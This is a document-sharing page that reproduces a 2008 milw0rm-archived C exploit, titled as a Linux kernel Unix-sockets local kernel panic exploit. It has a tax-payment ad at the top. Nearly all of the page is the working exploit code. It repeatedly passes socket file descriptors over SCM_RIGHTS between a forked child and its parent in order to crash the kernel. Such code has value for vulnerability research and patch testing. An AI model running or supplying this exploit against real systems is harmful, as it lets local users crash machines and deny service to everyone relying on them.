Your Federal Quarterly Tax Payments are due April 15th Get Help Now >>

Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit by h3m4n

VIEWS: 21,357 PAGES: 3

									                     Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit   Page 1/3
   1   #include     <sys/socket.h>
   2   #include     <sys/un.h>
   3   #include     <unistd.h>
   4   #include     <assert.h>
   5   #include     <err.h>
   6   #include     <stdlib.h>
   7
   8   static int own_child(int *us)
   9   {
  10           int pid;
  11           int s[2];
  12           struct msghdr mh;
  13           char crap[1024];
  14           struct iovec iov;
  15           struct cmsghdr *c;
  16           int *fd;
  17           int rc;
  18
  19            pid = fork();
  20            if (pid == −1)
  21                    err(1, "fork()");
  22
  23            if (pid) {
  24                  close(us[1]);
  25
  26                      return pid;
  27            }
  28
  29            close(us[0]);
  30
  31            memset(&mh, 0, sizeof(mh));
  32            iov.iov_base = "a";
  33            iov.iov_len = 1;
  34
  35            mh.msg_iov           =   &iov;
  36            mh.msg_iovlen        =   1;
  37            mh.msg_control       =   crap;
  38            mh.msg_controllen    =   sizeof(crap);
  39
  40            c = CMSG_FIRSTHDR(&mh);
  41            assert(c);
  42
  43            c−>cmsg_level = SOL_SOCKET;
  44            c−>cmsg_type = SCM_RIGHTS;
  45
  46            fd = (int*) CMSG_DATA(c);
  47            assert(fd);
  48
  49            c−>cmsg_len = CMSG_LEN(sizeof(int));
  50            mh.msg_controllen = c−>cmsg_len;
  51
  52            while (1) {
Andrea Bittau                                                                                11/11/2008
                    Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit   Page 2/3
  53                    if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == −1)
  54                            err(1, "socketpair()");
  55
  56                    *fd = s[0];
  57
  58                    rc = sendmsg(us[1], &mh, 0);
  59                    if (rc == −1)
  60                            err(1, "sendmsg()");
  61
  62                    if (rc != iov.iov_len)
  63                            errx(1, "sent short");
  64
  65                    close(s[0]);
  66                    close(us[1]);
  67                    us[1] = s[1];
  68            }
  69    }
  70
  71    static void own(void)
  72    {
  73            static int pid;
  74            static int us[2];
  75            char crap[1024];
  76            char morte[1024];
  77            struct cmsghdr *c;
  78            int rc;
  79            struct msghdr mh;
  80            struct iovec iov;
  81            int *fds;
  82
  83            if (!pid) {
  84                    if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == −1)
  85                            err(1, "socketpair()");
  86                    pid = own_child(us);
  87            }
  88
  89            iov.iov_base = morte;
  90            iov.iov_len = sizeof(morte);
  91
  92            memset(&mh, 0, sizeof(mh));
  93            mh.msg_iov        = &iov;
  94            mh.msg_iovlen     = 1;
  95            mh.msg_control    = crap;
  96            mh.msg_controllen = sizeof(crap);
  97
  98            rc = recvmsg(us[0], &mh, 0);
  99            if (rc == −1)
  100                   err(1, "recvmsg()");
  101
  102           if (rc == 0)
  103                   errx(1, "EOF");
  104

Andrea Bittau                                                                               11/11/2008
                  Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit   Page 3/3
  105           c = CMSG_FIRSTHDR(&mh);
  106           assert(c);
  107           assert(c−>cmsg_type == SCM_RIGHTS);
  108
  109           fds = (int*) CMSG_DATA(c);
  110           assert(fds);
  111
  112           close(us[0]);
  113           us[0] = *fds;
  114   }
  115
  116   int main(int argc, char *argv[])
  117   {
  118           own();
  119           exit(0);
  120   }
  121
  122   // milw0rm.com [2008−11−11]




Andrea Bittau                                                                             11/11/2008

								
To top